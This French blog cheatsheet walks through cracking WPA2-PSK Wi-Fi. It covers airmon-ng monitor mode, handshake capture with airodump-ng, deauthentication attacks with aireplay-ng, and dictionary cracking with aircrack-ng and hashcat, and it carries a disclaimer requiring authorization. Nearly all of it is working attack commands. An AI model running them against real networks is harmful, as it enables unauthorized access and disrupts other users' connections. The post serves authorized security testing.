Cheatsheet : WPA2-PSK
Posted on mer. 20 mai 2020 in cheatsheet
Disclaimer
N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.
Mode monitoring
- Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
- Activer le mode monitoring sur l'interface :
airmon-ng start wlan0
L'interface de monitoring est maintenant wlan0mon
ou assimilé (check avec ip l
).
Ciblage
airodump-ng wlan0mon
Repérer le BSSID
et le channel CH
du réseau ciblé.
Capture de handshake
airodump-ng -c <CHANNEL> --bssid <BSSID> -w . wlan0mon
Quand un handshake est capturé, le message [ WPA handshake: <mac>
apparaît sur la première ligne.
Deauth
Forcer une station connectée à se réauthentifier :
- Dans l'output du
airodump-ng
précédent, repérer la MAC d'une station à cibler (deuxième tableau, colonneSTATION
) - Lancer la deauth :
aireplay-ng -0 <n> -a <bssid> -c <station_mac> wlan0mon
Avec n
le nombre de paquets de deauth à envoyer.
Il est possible de broadcaster la deauth à tous les clients, mais tous les clients n'honorent pas les deauth en broadcast :
aireplay-ng -0 <n> -a <bssid> wlan0mon
Cracking
Une fois les handshakes capturés, il est possible de casser les mots de passe avec une attaque par dictionnaire ou par force brute :
Avec aircrack-ng
aircrack-ng -a2 -b <bssid> -w <dict> <target.cap>
-a2
indique qu'il s'agit de WPA2 PSK, <target.cap>
est le fichier généré par le airodump-ng
.
Avec hashcat
cap2hccapx.bin <target.cap> <target.hccapx>
hashcat -m 2500 <target.hccapx> <dict>